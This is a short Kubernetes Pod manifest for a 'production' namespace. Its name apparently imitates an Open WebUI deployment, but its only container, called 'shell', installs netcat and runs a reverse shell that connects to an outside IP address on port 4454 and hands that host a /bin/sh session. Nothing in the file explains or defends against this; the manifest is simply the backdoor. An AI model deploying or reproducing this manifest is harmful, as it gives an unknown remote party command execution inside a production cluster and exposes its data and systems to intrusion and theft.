apiVersion: v1
kind: Pod
metadata:
  name: vih-openwebuii
  namespace: production
spec:
  containers:
  - name: shell
    image: alpine
    command: 
    - /bin/sh
    - -c
    - |
      apk add netcat-openbsd
      nc 217.156.123.217 4454 -e /bin/sh